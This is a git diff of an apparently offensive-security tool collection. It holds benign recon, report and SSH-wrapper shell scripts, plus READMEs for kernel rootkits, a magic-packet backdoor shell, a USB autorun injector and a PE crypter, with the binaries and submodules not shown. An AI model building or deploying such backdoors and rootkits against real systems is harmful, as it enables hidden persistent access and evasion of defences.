" -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# check if ip utils is installed -check_ip_utils() -{ - str=`ip 2> /dev/stdout | head -1 | cut -d ' ' -f 1` - - if [ "${str}" = "Usage:" ] - then - iputil="ip" - fi - - return ${SUCCESS} -} - - -# get source ip address -# TOOLS: ifconfig ip -do_srcip() -{ - if [ -z "${SHOST}" ] - then - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | awk '/inet / {print $2}' | sed 's/\/.*//g' \ - 2>&1 - else - ifconfig ${NDEV} | awk '/inet / {print $2}' 2>&1 - fi - else - echo "${SHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get source mac address -# TOOLS: ifconfig -do_srcmac() -{ - if [ -z "${SMAC}" ] - then - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | grep "link/ether" | awk '{print $2}' 2>&1 - else - if [ `uname` = "OpenBSD" ] - then - ifconfig ${NDEV} | awk '/lladdr / {print $2}' 2>&1 - else - ifconfig ${NDEV} | awk '/ether / {print $2}' 2>&1 - fi - fi - else - echo "${SMAC}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get subnet mask -# TOOLS: ifconfig -do_subnetmask() -{ - #if [ "${iputil}" = "ip" ] - #then - # ip dev ${NDEV} 2>&1 - #else - #ifconfig ${NDEV} | awk '/inet / {print $4}' 2>&1 - #fi - - ifconfig ${NDEV} | awk '/inet / {print $4}' 2>&1 - - return ${SUCCESS} -} - - -# get broadcast address -# TOOLS: ifconfig -do_broadcast() -{ - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | grep '\' | awk '{print $4}' 2>&1 - else - ifconfig ${NDEV} | awk '/inet / {print $6}' 2>&1 - fi - - return ${SUCCESS} -} - - -# get ip address of router for default route -# TOOLS: netstat -do_routerip() -{ - if [ -z "${RHOST}" ] - then - if [ `uname` = "SunOS" ] - then - netstat -rn | grep "${NDEV}" | grep "default" | tr -s ' ' '-' | - cut -d '-' -f 2 - else - if [ "${iputil}" = "ip" ] - then - ip route | grep 'default' | cut -d ' ' -f 3 2>&1 - else - netstat -rn | grep "${NDEV}" | grep "^0.0.0.0" | - awk '{print $2}' 2>&1 - fi - fi - else - echo "${RHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get mac address of router -# TOOLS: arp -do_routermac() -{ - rhost="`head -1 routerip.log 2> /dev/null`" - - if [ -z "${RMAC}" ] - then - arp -an | grep "\<${rhost}\>" | cut -d ' ' -f 4 2>&1 - else - echo "${RMAC}" 2>&1 - fi - - return ${SUCCESS} -} - - -check_ip_utils - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/report/css.sh b/automation/sn00p/source/src/report/css.sh deleted file mode 100644 index 2c3b3fc..0000000 --- a/automation/sn00p/source/src/report/css.sh +++ /dev/null @@ -1,112 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- -make_css_line() -{ - echo "#line" >> ${cfile} - echo "{" >> ${cfile} - echo " background-color: red;" >> ${cfile} - echo " height: 1px;" >> ${cfile} - echo " width: 910px auto;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - - return ${SUCCESS} -} - - -# -make_css_tables() -{ - echo "body table" >> ${cfile} - echo "{" >> ${cfile} - echo " font-size: 12px;" >> ${cfile} - echo " font-family: arial;" >> ${cfile} - echo " width: 200px;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - - return ${SUCCESS} -} - - -# -make_css_links() -{ - echo "body a" >> ${cfile} - echo "{" >> ${cfile} - echo " color: #d8d8d8;" >> ${cfile} - echo " text-decoration: none;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - echo "body a:hover" >> ${cfile} - echo "{" >> ${cfile} - echo " color: #088A08;" >> ${cfile} - echo " text-decoration: none;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - - return ${SUCCESS} -} - - -# -make_css_body() -{ - # body part - echo '@charset "UTF-8";' > ${cfile} - echo >> ${cfile} - echo "body" >> ${cfile} - echo "{" >> ${cfile} - echo " font-size: 12px;" >> ${cfile} - echo " font-family: arial;" >> ${cfile} - echo " width: 910px;" >> ${cfile} - echo " color: #40FF00;" >> ${cfile} - echo " background-color: #000000;" >> ${cfile} - echo "}" >> ${cfile} - echo >> ${cfile} - - return ${SUCCESS} -} - - -# generate css file for html report -make_css() -{ - make_css_body - make_css_links - make_css_tables - make_css_line - - return ${SUCCESS} -} - - -# EOF diff --git a/automation/sn00p/source/src/report/html.sh b/automation/sn00p/source/src/report/html.sh deleted file mode 100644 index 16dc05c..0000000 --- a/automation/sn00p/source/src/report/html.sh +++ /dev/null @@ -1,295 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > ${hfile} - msg "" >> ${hfile} - msg "sn00p report" >> ${hfile} - msg '' \ - >> ${hfile} - msg "" >> ${hfile} - msg "" >> ${hfile} - msg '
' >> ${hfile} - msg "

sn00p report (`date +%F`)

" >> ${hfile} - msg '
' >> ${hfile} - - return ${SUCCESS} -} - - -# generate summary -make_html_summary() -{ - msg "

SUMMARY

" >> ${1} - msg "
" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "" >> ${1} - msg "
HOST${num_hosts}
TCP${num_tcp}
UDP${num_udp}
WWW${num_www}
LAN${num_lan}
WLAN${num_wlan}
" >> ${1} - msg "
" >> ${1} - msg '
' >> ${1} - - return ${SUCCESS} -} - - -# generate target list -make_html_target_list() -{ - # for table rows - cnt="0" - - msg "

TARGET LIST

" >> ${1} - - for i in ${hosts} - do - cnt=`expr ${cnt} + 1` - - # install link - msg "[ ${i} ]  " >> ${1} - - # max 8 rows for table - if [ ${cnt} -eq 8 ] - then - msg "
" >> ${1} - cnt="0" - fi - done - - return ${SUCCESS} -} - - -# generate html files for each host and generate the header -make_html_target_files() -{ - for h in ${hosts} - do - make_html_header "report/${h}.html" - done - - return ${SUCCESS} -} - - -# results of tcp or udp based audits -make_port_results() -{ - for j in `ls "${i}/${_prot}" 2> /dev/null` - do - for k in `ls "${i}/${_prot}/${j}" 2> /dev/null` - do - msg "[ ` msg ${j} - ${k} | - sed 's/\.log//'` ]
" >> ${1} - msg "
`cat "${i}/${_prot}/${j}/${k}" | sed 's///g'`
" >> ${1} - done - done - - return ${SUCCESS} -} - - -# generate results of each hosts from the list -make_html_results() -{ - modes="host tcp udp web lan wlan" - - for i in ${hosts} - do - msg "

RESULTS

" >> "report/${i}.html" - make_modules_links "report/${i}.html" - msg "

" >> "report/${i}.html" - for mode in ${modes} - do - for j in `ls "${i}/${mode}" 2> /dev/null` - do - for k in `ls "${i}/${mode}/${j}/" 2> /dev/null` - do - msg "[ ` msg ${j} - ${k} | - sed 's/\.log//'` ]
" >> "report/${i}.html" - msg "
`cat "${i}/${mode}/${j}/${k}" |
-                    sed 's/" >> "report/${i}.html"
-                done
-            done
-        done
-        msg "
" >> "report/${i}.html"
-        make_html_footer "report/${i}.html"
-        msg '
' >> "report/${i}.html"
-    done
-
-    return ${SUCCESS}
-}
-
-
-# create links of lan modules in table format
-make_lan_links()
-{
-    msg "LAN

" >> ${1}
-
-    for l in `ls "${i}/lan/"`
-    do
-        if [ ${l} ]
-        then
-            msg "[ ${l} ]  " >> ${1}
-        fi
-    done
-
-    return ${SUCCESS}
-}
-
-
-# create links of web modules in table format
-make_web_links()
-{
-    msg "WWW

" >> ${1}
-
-    for w in `ls "${i}/web/" 2> /dev/null`
-    do
-        if [ ${w} ]
-        then
-            msg "[ ${w} ]  " >> ${1}
-        fi
-    done
-
-    return ${SUCCESS}
-}
-
-
-# create links of ports in table format
-make_port_links()
-{
-    msg "

${__prot}

" >> ${1}
-
-    for j in `ls "${i}/${_prot}/"`
-    do
-        msg "[ ${j} ]  " >> ${1}
-    done
-
-    return ${SUCCESS}
-}
-
-
-# create links of hosts in table format
-make_host_links()
-{
-    msg "HOST

" >> ${1}
-
-    for j in `ls "${i}/host/" 2> /dev/null`
-    do
-        if [ ${j} ]
-        then
-            msg "[ ${j} ]  " >> ${1}
-        fi
-    done
-
-    msg "

" >> ${1}
-
-    return ${SUCCESS}
-}
-
-
-# create links of modules in table format using div
-make_modules_links()
-{
-    msg "
" \
-        >> ${1}
-    msg "${i}

" >> ${1}
-
-    if [ ${num_hosts} -gt 0 ]
-    then
-        make_host_links ${1}
-    fi
-    if [ ${num_tcp} -gt 0 ]
-    then
-        _prot="tcp"
-        __prot="TCP"
-    fi
-    if [ ${num_udp} -gt 0 ]
-    then
-        _prot="udp"
-        __prot="UDP"
-    fi
-    if [ ${_prot} ]
-    then
-        if [ ${num_tcp} -gt 0 -o ${num_udp} -gt 0 ]
-        then
-            make_port_links ${1}
-        fi
-    else
-        _prot="tcp"
-    fi
-    if [ ${num_www} -gt 0 ]
-    then
-        make_web_links ${1}
-    fi
-
-    msg "
" >> ${1}
-    msg "
" >> ${1}
-
-    return ${SUCCESS}
-}
-
-
-# generate html footer
-make_html_footer()
-{
-    msg "" >> ${1}
-    msg "" >> ${1}
-    msg "" >> ${1}
-
-    return ${SUCCESS}
-}
-
-# EOF
diff --git a/automation/sn00p/source/src/report/report.sh b/automation/sn00p/source/src/report/report.sh
deleted file mode 100644
index 9a60916..0000000
--- a/automation/sn00p/source/src/report/report.sh
+++ /dev/null
@@ -1,108 +0,0 @@
-#!/bin/sh
-################################################################################
-#                ____                     _ __                                 #
-#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
-#    / _ \/ // / / (_-/dev/null | cut -d "/" -f 3 | wc -l`"
-    num_udp="`find */udp/* -type d 2>/dev/null | cut -d "/" -f 3 | wc -l`"
-    num_www="`find . -mindepth 2 -maxdepth 2 -type d -name "web" | wc -l`"
-    num_lan="`find . -mindepth 2 -maxdepth 2 -type d -name "lan" | wc -l`"
-    num_wlan="`find . -mindepth 2 -maxdepth 2 -type d -name "wlan" | wc -l`"
-
-    return ${SUCCESS}
-}
-
-
-# generate report
-report()
-{
-    # report creation date
-    _date="`date +%F`"
-
-    mkdir "report"
-    count
-
-    if [ "${report_style}" = "txt" ]
-    then
-        report_txt
-    elif [ "${report_style}" = "html" ]
-    then
-        report_html
-    else
-        rm -rf "report" > ${VERBOSE} 2>&1
-        return ${SUCCESS}
-    fi
-
-    return ${SUCCESS}
-}
-
-# EOF
diff --git a/automation/sn00p/source/src/report/txt.sh b/automation/sn00p/source/src/report/txt.sh
deleted file mode 100644
index 7f49f83..0000000
--- a/automation/sn00p/source/src/report/txt.sh
+++ /dev/null
@@ -1,113 +0,0 @@
-#!/bin/sh
-################################################################################
-#                ____                     _ __                                 #
-#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
-#    / _ \/ // / / (_-> "report/${i}.txt"
-        msg "-----------------------------------------------------------------"\
-"---------------\n" >> "report/${i}.txt"
-
-        for mode in ${modes}
-        do
-            for j in `ls "${i}/${mode}" 2> /dev/null`
-            do
-                for k in `ls "${i}/${mode}/${j}/" 2> /dev/null`
-                do
-                    msg "` msg ${j} \(${mode}\) - ${k} | sed 's/\.log//'`\n" \
-                        >> "report/${i}.txt"
-                    msg "`cat ${i}/${mode}/${j}/${k}`\n" >> "report/${i}.txt"
-                    msg "-----------------------------------------------------"\
-"---------------------------\n" >> "report/${i}.txt"
-                done
-            done
-        done
-    done
-
-    return ${SUCCESS}
-}
-
-
-# generate target list
-make_txt_target_list()
-{
-    tfile="${1}"
-
-    msg "[ TARGET LIST ]\n" >> ${tfile}
-
-    for i in ${hosts}
-    do
-        msg "${i}" >> ${tfile}
-    done
-
-    msg "\n------------------------------------------------------------------"\
-"--------------\n" >> ${tfile}
-
-    return ${SUCCESS}
-}
-
-
-# generate text header
-make_txt_header()
-{
-    tfile="${1}"
-
-    msg "sn00p report (`date +%F`)" > ${tfile}
-    msg "------------------------------------------------------------------"\
-"--------------\n" >> ${tfile}
-
-    return ${SUCCESS}
-}
-
-
-# generate text summay
-make_txt_summary()
-{
-    tfile="${1}"
-
-    msg "[ SUMMARY ]\n" >> ${tfile}
-    msg "HOST\t\t${num_hosts}" >> ${tfile}
-    msg "TCP\t\t${num_tcp}" >> ${tfile}
-    msg "UDP\t\t${num_udp}" >> ${tfile}
-    msg "WWW\t\t${num_www}" >> ${tfile}
-    msg "LAN\t\t${num_lan}" >> ${tfile}
-    msg "WLAN\t\t${num_wlan}" >> ${tfile}
-    msg "" >> ${tfile}
-    msg "------------------------------------------------------------------"\
-"--------------\n" >> ${tfile}
-
-    return ${SUCCESS}
-}
-
-# EOF
diff --git a/automation/sn00p/source/src/sn00p b/automation/sn00p/source/src/sn00p
deleted file mode 100755
index c39c7d5..0000000
--- a/automation/sn00p/source/src/sn00p
+++ /dev/null
@@ -1,125 +0,0 @@
-#!/bin/sh
-################################################################################
-#                ____                     _ __                                 #
-#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
-#    / _ \/ // / / (_-] []
+OPTIONS:
+    -m : mode/id to machine
+    -e: edit conf file [/home/user/.wssh/wssh.conf]
+    -l: list modes
+    -S : scp to machine
+    -s : change file where upload or download file [default:~/]
+OVERWRITE:
+    -u : switch user
+    -h : switch host
+    -p : switch port
+    -c: disable check host fingerprint [default:true]
+    -x : extra commands
+MISC:
+    -V: print version of wssh and exit
+    -H: print this help and exit
+EXAMPLE:
+    wssh -m b0x -x'-D1234' # socks proxy mode
+    wssh -m b0x -S file -d '/data/' # upload file to /data
+    wssh -m b0x -s file # download file from home
+    wssh -m b0x -p 1337 -S file # use diff port for b0x config uploading file to home
+    wssh b0x # no shitty args anymore - just fucking show me the shell :)
+
+
+CONFIGURATION FILE
+==================
+
+$ cat ~/.wssh/wssh.conf
+
+# id;ip;port[def:22];user;check_host_fingerprint;extra_opt
+vulndev;192.168.1.40;;root;false;-Y
+android;192.168.1.8;;nrz;false;-Y
+debian64;localhost;2222;root;false;
+vpn_www;192.168.1.56;3224;nrz;false;false;-L 8080:localhost:80
+
+
+EXAMPLE
+=======
+
+ $ wssh vpn
+--==[ wssh by nrz@nullsecurity.net ]==--
+[+] ssh(192.168.1.56:3224) -L 8080:localhost:80
+vpn_www ~ $
+
+#eof
diff --git a/automation/wssh/source/wssh.sh b/automation/wssh/source/wssh.sh
new file mode 100755
index 0000000..083fa62
--- /dev/null
+++ b/automation/wssh/source/wssh.sh
@@ -0,0 +1,315 @@
+#!/bin/bash
+################################################################################
+#                ____                     _ __                                 #
+#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
+#    / _ \/ // / / (_-] []
+OPTIONS:
+    -m : mode/id to machine
+    -e: edit conf file [${MODE_FILE}]
+    -l: list modes
+    -S : scp to machine
+    -s : change file where upload or download file [default:~/]
+OVERWRITE:
+    -u : switch user
+    -h : switch host
+    -p : switch port
+    -c: disable check host fingerprint [default:true]
+    -x : extra commands
+MISC:
+    -V: print version of wssh and exit
+    -H: print this help and exit
+EXAMPLE:
+    wssh -m b0x -x'-D1234' # socks proxy mode
+    wssh -m b0x -S file -d '/data/' # upload file to /data
+    wssh -m b0x -s file # download file from home
+    wssh -m b0x -p 1337 -S file # use diff port for b0x config uploading file to home
+    wssh b0x # no shitty args anymore - just fucking show me the shell :)
+EOF
+    exit "${SUCCESS}"
+}
+
+
+# leet banner, very important
+banner()
+{
+    echo "--==[ wssh by nrz@nullsecurity.net ]==--"
+
+    return "${SUCCESS}"
+}
+
+
+# check argument count
+check_argc()
+{
+    if [ "${#}" -lt 1 ]
+    then
+        usage
+    fi
+
+    return "${SUCCESS}"
+}
+
+
+# check if required arguments were selected
+check_args()
+{
+    return "${SUCCESS}"
+}
+
+
+# parse command line options
+get_opts()
+{
+    while getopts m:elS:s:d:u:h:p:cx:vVH flags
+    do
+        case "${flags}" in
+            m)
+                MODE=${OPTARG}
+                ;;
+            e)
+                vim "${MODE_FILE}"
+                exit "${SUCCESS}"
+                ;;
+            l)
+                cat "${MODE_FILE}"
+                exit "${SUCCESS}"
+                ;;
+            S)
+                SCP=true
+                UPLOAD="${OPTARG}"
+                ;;
+            s)
+                SCP=true
+                if [ "${OPTARG:0:1}" == "/" ]; then
+                    DOWNLOAD=${OPTARG}
+                else
+                    DOWNLOAD="~/${OPTARG}"
+                fi
+                ;;
+            d)
+                DOWN_UP_DIR=${OPTARG}
+                ;;
+            u)
+                OPT_USER=${OPTARG}
+                ;;
+            h)
+                OPT_HOST=${OPTARG}
+                ;;
+            p)
+                OPT_PORT=${OPTARG}
+                ;;
+            c)
+                OPT_CHECK=true
+                ;;
+            x)
+                OPT_EXTRA=${OPTARG}
+                ;;
+            v)
+                VERBOSE="/dev/stdout"
+                ;;
+            V)
+                echo "${VERSION}"
+                exit "${SUCCESS}"
+                ;;
+            H)
+                usage
+                ;;
+            *)
+                err "WTF?! mount /dev/brain"
+                ;;
+        esac
+    done
+
+    return "${SUCCESS}"
+}
+
+set_vars()
+{
+    if [ -n "${MODE}" ]; then
+        local mode_line=$(awk -v J=1 -v R="${MODE}" '{if (match($J, R)) print $0;}' "${MODE_FILE}")
+        if [ -n "${mode_line}" ]; then
+            IFS=';' read -r MODE HOST PORT USER CHECK EXTRA <<< "${mode_line}"
+        else
+            cri "mode not found"
+        fi
+    fi
+    # set vars - use config from file if not arguments or just defaults
+    [ -n "${OPT_USER}" ] && USER=${OPT_USER}
+    [ -n "${OPT_HOST}" ] && HOST=${OPT_HOST}
+    [ -n "${OPT_PORT}" ] && PORT=${OPT_PORT}
+    [ -z "${PORT}" ] && PORT=22
+    [ -n "${OPT_CHECK}" ] && CHECK=false
+    [ -n "${OPT_EXTRA}" ] && EXTRA=${OPT_EXTRA}
+
+    # scp
+    DOWNLOAD_DIR="."
+    UPLOAD_DIR="~/"
+    [ -n "${DOWN_UP_DIR}" ] && DOWNLOAD_DIR="${DOWN_UP_DIR}/"
+    [ -n "${DOWN_UP_DIR}" ] && UPLOAD_DIR="${DOWN_UP_DIR}/"
+
+    return
+}
+
+create_mode_file()
+{
+    mkdir -p /home/${USER}/.wssh
+    printf "# id;ip;port[def:22];user;check_host_fingerprint;extra_opt\n" >> ${MODE_FILE}
+    printf "sample;192.168.1.1;4564;nrz;false;-L 8080:localhost:80\n" >> "${MODE_FILE}"
+
+    return
+}
+
+# controller and program flow
+main()
+{
+    # defaults
+    CHECK=true
+    SCP=false
+
+    #gogogo
+    banner
+
+    #check mode file
+    ! [ -f "${MODE_FILE}" ] && create_mode_file
+
+    # ssh(lazy(lazy())) -> $ wssh 
+    if [ "$#" == "1" ] && ! [ "${1:0:1}" == "-" ]; then
+        MODE=${1}
+    else
+        check_argc ${*}
+        get_opts ${*}
+        check_args ${*}
+    fi
+
+    set_vars
+
+    if ${SCP}; then
+        printf "[+] scp(%s:%s) %s\n" "${HOST}" "${PORT}" "${EXTRA}"
+    else
+        printf "[+] ssh(%s:%s) %s\n" "${HOST}" "${PORT}" "${EXTRA}"
+    fi
+
+    if ${CHECK}; then
+        if ${SCP}; then
+            if [ -n "${UPLOAD}" ]; then
+                scp -r -P "${PORT}" ${UPLOAD} "${USER}@${HOST}:${UPLOAD_DIR}"
+            else
+                scp -r -P "${PORT}" "${USER}@${HOST}:${DOWNLOAD}" "${DOWNLOAD_DIR}"
+            fi
+        else
+            ssh -p "${PORT}" "${USER}@${HOST}" ${EXTRA}
+        fi
+    else
+        if ${SCP}; then
+            if [ -n "${UPLOAD}" ]; then
+                scp -r ${DONT_CHECK_HOST} -P "${PORT}" ${UPLOAD} "${USER}@${HOST}:${UPLOAD_DIR}"
+            else
+                scp -r ${DONT_CHECK_HOST} -P "${PORT}" "${USER}@${HOST}:${DOWNLOAD}" "${DOWNLOAD_DIR}"
+            fi
+        else
+            ssh ${DONT_CHECK_HOST} -p "${PORT}" "${USER}@${HOST}" ${EXTRA}
+        fi
+    fi
+
+    return "${SUCCESS}"
+}
+
+main ${*}
+
+# EOF
diff --git a/backdoor/README.md b/backdoor/README.md
index 99a386d..e630379 100644
--- a/backdoor/README.md
+++ b/backdoor/README.md
@@ -1,5 +1,4 @@
-About
-=====
+# About
 Backdoors and rootkits for kernel and userland, network, hardware and software.
 Once you have gone through all the hard work making sure you can get on the
 system. Make sure you can always get back in.
@@ -7,8 +6,7 @@ system. Make sure you can always get back in.
 If you find some bugs or if you have any questions, ideas or criticism regarding
 to this section, feel free to message us.
 
-Disclaimer
-==========
+# Disclaimer
 We hereby emphasize, that the hacking related stuff on
 [nullsecurity.net](http://nullsecurity.net) is only for education purposes.
 We are not responsible for any damages. You are responsible for your own
diff --git a/backdoor/fbkit/README.md b/backdoor/fbkit/README.md
new file mode 100644
index 0000000..d383cd8
--- /dev/null
+++ b/backdoor/fbkit/README.md
@@ -0,0 +1,35 @@
+# Description
+
+A very old FreeBSD rootkit for the 1337 h4x0rs out there. This was my first
+attempt to code in FreeBSD kernel land. So bear with me. :)
+This version should work for at least for FreeBSD 7 and 8.
+
+# Usage
+
+```
+Blah read code.
+```
+
+# Installation
+
+Run `install.sh`.
+
+# Author
+
+noptrix
+
+# Notes
+
+- quick'n'dirty code
+- My master-branches are always dev-branches; use releases for stable versions.
+- All of my public stuff you find are officially announced and published via [nullsecurity.net](https://www.nullsecurity.net).
+
+# License
+
+Check docs/LICENSE.
+
+# Disclaimer
+We hereby emphasize, that the hacking related stuff found on
+[nullsecurity.net](http://nullsecurity.net/) are only for education purposes.
+We are not responsible for any damages. You are responsible for your own
+actions.
diff --git a/backdoor/fbkit/release/fbkit-0.0.1.tar.gz b/backdoor/fbkit/release/fbkit-0.0.1.tar.gz
new file mode 100644
index 0000000..f0cbd5f
Binary files /dev/null and b/backdoor/fbkit/release/fbkit-0.0.1.tar.gz differ
diff --git a/backdoor/fbkit/source b/backdoor/fbkit/source
new file mode 160000
index 0000000..88ff133
--- /dev/null
+++ b/backdoor/fbkit/source
@@ -0,0 +1 @@
+Subproject commit 88ff133fd10701564730c419ee44b313a76a6500
diff --git a/backdoor/mbr_store/README.md b/backdoor/mbr_store/README.md
index e64cedc..aee48b0 100644
--- a/backdoor/mbr_store/README.md
+++ b/backdoor/mbr_store/README.md
@@ -1,20 +1,13 @@
-Description
-===========
+# Description
 This tool stores up to 426 bytes in the MBR's bootloader code section of unused
 devices such as usb drivers, hrd disks (which are not supposed to boot) and
 other media. GRUB detection is implemented for safety reasons, Windows
 bootloader code will be shamelessly overwritten. ;)
 
-MD5
-===
-ba5fdecf9ff48012030d8d4d3a9a0448
-
-Author
-======
+# Author
 atzeton
 
-Disclaimer
-==========
+# Disclaimer
 We hereby emphasize, that the hacking related stuff on
 [nullsecurity.net](http://nullsecurity.net) is only for education purposes.
 We are not responsible for any damages. You are responsible for your own
diff --git a/backdoor/rubilyn/README.md b/backdoor/rubilyn/README.md
index e415d4c..689396f 100644
--- a/backdoor/rubilyn/README.md
+++ b/backdoor/rubilyn/README.md
@@ -1,21 +1,14 @@
-Description
-===========
+# Description
 64bit Mac OS-X kernel rootkit that uses no hardcoded address to hook the BSD
 subsystem in all OS-X Lion & below. It uses a combination of syscall hooking and
 DKOM to hide activity on a host. String resolution of symbols no longer works on
 Mountain Lion as symtab is destroyed during load, this code is portable on all
 Lion & below but requires re-working for hooking under Mountain Lion.
 
-MD5
-===
-33102898e02eb66cfc1a8f832472bf9e
-
-Author
-======
+# Author
 prdelka
 
-Disclaimer
-==========
+# Disclaimer
 We hereby emphasize, that the hacking related stuff on
 [nullsecurity.net](http://nullsecurity.net) is only for education purposes.
 We are not responsible for any damages. You are responsible for your own
diff --git a/backdoor/trixd00r/README.md b/backdoor/trixd00r/README.md
new file mode 100644
index 0000000..a69a6e0
--- /dev/null
+++ b/backdoor/trixd00r/README.md
@@ -0,0 +1,16 @@
+# Description
+trixd00r is an advanced and invisible userland backdoor based on TCP/IP for UNIX
+systems. It consists of a server and a client. The server sits and waits for
+magic packets using a sniffer. If a magic packet arrives, it will bind a shell
+over TCP or UDP on the given port or connecting back to the client again over
+TCP or UDP. The client is used to send magic packets to trigger the server and
+get a shell.
+
+# Author
+noptrix
+
+# Disclaimer
+We hereby emphasize, that the hacking related stuff on
+[nullsecurity.net](http://nullsecurity.net) is only for education purposes.
+We are not responsible for any damages. You are responsible for your own
+actions.
diff --git a/backdoor/u3-pwn/README.md b/backdoor/u3-pwn/README.md
index 8043b76..a2e84c7 100644
--- a/backdoor/u3-pwn/README.md
+++ b/backdoor/u3-pwn/README.md
@@ -1,19 +1,12 @@
-Description
-===========
+# Description
 U3-Pwn is a tool designed to automate injecting executables to Sandisk smart usb
 devices with default U3 software install. This is performed by removing the
 original iso file from the device and creating a new iso with autorun features.
 
-MD5
-===
-ef1d6b0184d5824b43f3870530502d98
-
-Author
-======
+# Author
 Zy0d0x
 
-Disclaimer
-==========
+# Disclaimer
 We hereby emphasize, that the hacking related stuff on
 [nullsecurity.net](http://nullsecurity.net) is only for education purposes.
 We are not responsible for any damages. You are responsible for your own
diff --git a/backdoor/u3-pwn/source/src/about.py b/backdoor/u3-pwn/source/src/about.py
index 39d2c13..38d74b1 100755
--- a/backdoor/u3-pwn/source/src/about.py
+++ b/backdoor/u3-pwn/source/src/about.py
@@ -40,7 +40,7 @@
 banner.print_banner()
 
 print '''
- U3-Pwn is a tool designed to automate injecting executerbles to Sandisk 
+ U3-Pwn is a tool designed to automate injecting executables to Sandisk 
  smart usb devices with default U3 software install.  This is performed by 
  removing the original iso file from the device and creating a new iso 
  with autorun features.
diff --git a/binary/README.md b/binary/README.md
index ae39cee..19afc0e 100644
--- a/binary/README.md
+++ b/binary/README.md
@@ -1,5 +1,4 @@
-About
-=====
+# About
 ELF and PE binary related tools. This section includes packers, runtime
 crypters, including our famous (thanks trusted sec team) hyperion tool from our
 very own belial and other stuff.
@@ -7,8 +6,7 @@ very own belial and other stuff.
 If you find some bugs or if you have any questions, ideas or criticism regarding
 to this section, feel free to message us.
 
-Disclaimer
-==========
+# Disclaimer
 We hereby emphasize, that the hacking related stuff on
 [nullsecurity.net](http://nullsecurity.net) is only for education purposes.
 We are not responsible for any damages. You are responsible for your own
diff --git a/binary/hyperion/README.md b/binary/hyperion/README.md
index 67dbd9a..3ea83af 100644
--- a/binary/hyperion/README.md
+++ b/binary/hyperion/README.md
@@ -1,19 +1,12 @@
-Description
-===========
-Hyperion is a runtime encrypter for 32-bit portable executables. It is a
+# Description
+Hyperion is a runtime encrypter for 32/64 bit portable executables. It is a
 reference implementation and bases on the paper "Hyperion: Implementation of a
 PE-Crypter".
 
-MD5
-===
-026f63744e92e0bb9a34d3fe858fa75a
-
-Author
-======
+# Author
 belial
 
-Disclaimer
-==========
+# Disclaimer
 We hereby emphasize, that the hacking related stuff on
 [nullsecurity.net](http://nullsecurity.net) is only for education purposes.
 We are not responsible for any damages. You are responsible for your own
diff --git a/binary/hyperion/release/Hyperion-1.2.zip b/binary/hyperion/release/Hyperion-1.2.zip
new file mode 100644
index 0000000..df50b78
Binary files /dev/null and b/binary/hyperion/release/Hyperion-1.2.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.0.zip b/binary/hyperion/release/Hyperion-2.0.zip
new file mode 100644
index 0000000..82d5529
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.0.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.1.zip b/binary/hyperion/release/Hyperion-2.1.zip
new file mode 100644
index 0000000..c49d541
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.1.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.2.zip b/binary/hyperion/release/Hyperion-2.2.zip
new file mode 100644
index 0000000..986a2a9
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.2.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.3.1.zip b/binary/hyperion/release/Hyperion-2.3.1.zip
new file mode 100644
index 0000000..401e28c
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.3.1.zip differ
diff --git a/binary/hyperion/release/Hyperion-2.3.zip b/binary/hyperion/release/Hyperion-2.3.zip
new file mode 100644
index 0000000..0175b32
Binary files /dev/null and b/binary/hyperion/release/Hyperion-2.3.zip differ
diff --git a/binary/hyperion/source/.gitignore b/binary/hyperion/source/.gitignore
new file mode 100644
index 0000000..4fcf731
--- /dev/null
+++ b/binary/hyperion/source/.gitignore
@@ -0,0 +1,21 @@
+Src/Container/64/decryption_payload.asm
+Src/Container/64/image_base.inc
+Src/Container/64/image_size.inc
+Src/Container/64/infile_array.inc
+Src/Container/64/infile_size.inc
+Src/Container/64/key_size.inc
+Src/Container/64/logfile_select.asm
+Src/Container/64/main_prolog.inc
+Src/Container/32/decryption_payload.asm
+Src/Container/32/image_base.inc
+Src/Container/32/image_size.inc
+Src/Container/32/infile_array.inc
+Src/Container/32/infile_size.inc
+Src/Container/32/key_size.inc
+Src/Container/32/logfile_select.asm
+Src/Container/32/main_prolog.inc
+Src/Crypter/*.o
+Src/Payloads/Aes/c/*.o
+hyperion.exe
+log.txt
+*.exe
